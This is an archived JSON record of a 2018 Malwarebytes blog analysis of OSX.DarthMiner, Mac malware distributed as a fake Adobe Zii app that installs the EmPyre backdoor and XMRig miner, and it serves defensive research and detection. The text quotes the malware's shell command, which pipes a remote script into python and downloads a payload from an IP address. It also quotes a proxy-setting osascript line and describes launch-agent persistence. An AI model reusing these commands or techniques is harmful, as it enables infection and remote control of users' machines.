{
	"id": "176d48fb-2179-43ae-b7a5-6f9f6037d34f",
	"created_at": "2026-04-06T00:15:16.463551Z",
	"updated_at": "2026-04-10T03:20:18.744539Z",
	"deleted_at": null,
	"sha1_hash": "b8d2e5c3c8e06dc2aae0343bde947ce9a84f826b",
	"title": "Mac malware combines EmPyre backdoor and XMRig miner",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 84704,
	"plain_text": "Mac malware combines EmPyre backdoor and XMRig miner\r\nBy Thomas Reed\r\nPublished: 2018-12-06 · Archived: 2026-04-05 23:36:16 UTC\r\nEarlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools—\r\nthe EmPyre backdoor and the XMRig cryptominer—for the purpose of evil.\r\nThe malware was being distributed through an application named Adobe Zii. Adobe Zii is software that is\r\ndesigned to aid in the piracy of a variety of Adobe applications. In this case, however, the app was called Adobe\r\nZii, but it was definitely not the real thing.\r\nAs can be seen from the above screenshots, the actual Adobe Zii software, on the left, uses the Adobe Creative\r\nCloud logo. (After all, if you’re going to write software to help people steal Adobe software, why not steal the\r\nlogo, too?) The malware installer, however, uses a generic Automator applet icon.\r\nBehavior\r\nOpening the fake Adobe Zii app with Automator reveals the nature of the software, as it simply runs a shell script:\r\ncurl https://ptpb.pw/jj9a | python - \u0026 s=46.226.108.171:80; curl $s/sample.zip -o sample.zip; unzip s\r\nThis script is designed to download and execute a Python script, then download and run an app named\r\nsample.app.\r\nThe sample.app is simple. It appears to simply be a version of Adobe Zii, most likely for the purpose of making it\r\nappear that the malware was actually “legitimate.” (This is not to imply that software piracy is legitimate, of\r\ncourse, but rather it means that the malware was attempting to look like it was doing what the user thought it was\r\nintended to do.)\r\nWhat about the Python script? That turned out to be obfuscated, but was easily deobfuscated, revealing the\r\nfollowing script:\r\nimport sys;import re, subprocess;cmd = \"ps -ef | grep Little Snitch | grep -v grep\" ps = subprocess.P\r\nhttps://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/\r\nPage 1 of 3\n\nThe first thing this script does is look for the presence of Little Snitch, a commonly-used outgoing firewall that\r\nwould be capable of bringing the backdoor’s network connection to the attention of the user. If Little Snitch is\r\npresent, the malware bails out. (Of course, if an outgoing firewall like Little Snitch were installed, it would have\r\nalready blocked the connection that would have attempted to download this script, so checking at this point is\r\nworthless.)\r\nThis script opens up a connection to an EmPyre backend, which is capable of pushing arbitrary commands to the\r\ninfected Mac. Once the backdoor is open, it receives a command that downloads the following script to\r\n/private/tmp/uploadminer.sh and executes it:\r\n# osascript -e \"do shell script \"networksetup -setsecurewebproxy \"Wi-Fi\" 46.226.108.171 8080 \u0026\u0026 netwo\r\nThis script downloads and installs the other components of the malware. A launch agent named\r\ncom.proxy.initialize.plist was created to keep the backdoor open persistently by running exactly the same\r\nobfuscated Python script mentioned previously.\r\nThe script also downloads the XMRig cryptominer and a config file into the /Users/Shared/ folder, and sets up a\r\nlaunch agent named com.apple.rig.plist to keep the XMRig process running with that configuration active. (The\r\n“com.apple” name is an immediate red flag that was the root cause of the discovery of this malware.)\r\nInterestingly, there’s code in that script to download and install a root certificate associated with the mitmproxy\r\nsoftware, which is software capable of intercepting all web traffic, including (with the aid of the certificate)\r\nencrypted “https” traffic. However, that code was commented out, indicating it was not active.\r\nOn the surface, this malware appears to be fairly harmless. Cryptominers typically only cause the computer to\r\nslow down, thanks to a process that sucks up all the CPU/GPU.\r\nHowever, this is not just a cryptominer. It’s important to keep in mind that the cryptominer was installed through a\r\ncommand issued by the backdoor, and there may very well have been other arbitrary commands sent to infected\r\nMacs by the backdoor in the past. It’s impossible to know exactly what damage this malware might have done to\r\ninfected systems. Just because we have only observed the mining behavior does not mean it hasn’t ever done other\r\nthings.\r\nImplications\r\nMalwarebytes for Mac detects this malware as OSX.DarthMiner. If you’re infected, it’s impossible to say what\r\nelse the malware may have done besides cryptomining. It’s entirely possible it could have exfiltrated files or\r\ncaptured passwords.\r\nThere’s an important lesson to learn from this. Software piracy is known to be one of the riskiest activities you can\r\nundertake on your Mac. The danger of infection is high, and this is not new, yet people still engage in this\r\nbehavior. Please, in the future, do yourself a favor and don’t pirate software. The costs can be far higher than\r\npurchasing the software you’re trying to get for free.\r\nIOCs\r\nhttps://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/\r\nPage 2 of 3\n\nAdobe Zii.app.zip SHA256:\r\nebecdeac53069c9db1207b2e0d1110a73bc289e31b0d3261d903163ca4b1e31e\r\nAbout the author\r\nHad a Mac before it was cool to have Macs. Self-trained Apple security expert. Amateur photographer.\r\nSource: https://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/\r\nhttps://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/"
	],
	"report_names": [
		"mac-malware-combines-empyre-backdoor-and-xmrig-miner"
	],
	"threat_actors": [],
	"ts_created_at": 1775434516,
	"ts_updated_at": 1775791218,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b8d2e5c3c8e06dc2aae0343bde947ce9a84f826b.pdf",
		"text": "https://archive.orkl.eu/b8d2e5c3c8e06dc2aae0343bde947ce9a84f826b.txt",
		"img": "https://archive.orkl.eu/b8d2e5c3c8e06dc2aae0343bde947ce9a84f826b.jpg"
	}
}